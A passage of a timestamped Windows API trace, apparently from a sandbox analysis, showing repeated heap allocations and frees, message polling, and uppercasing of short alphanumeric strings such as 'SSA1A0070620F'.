(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a10 [0087.860] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0087.860] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0087.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0087.860] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0087.860] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a10 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.861] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.861] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0087.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.861] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743a0 [0087.862] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0087.862] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0087.862] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0087.862] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.863] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743a0 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.863] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0087.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0087.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0087.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0087.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0087.864] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0087.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.864] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0087.864] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0087.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0087.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0087.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0087.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: 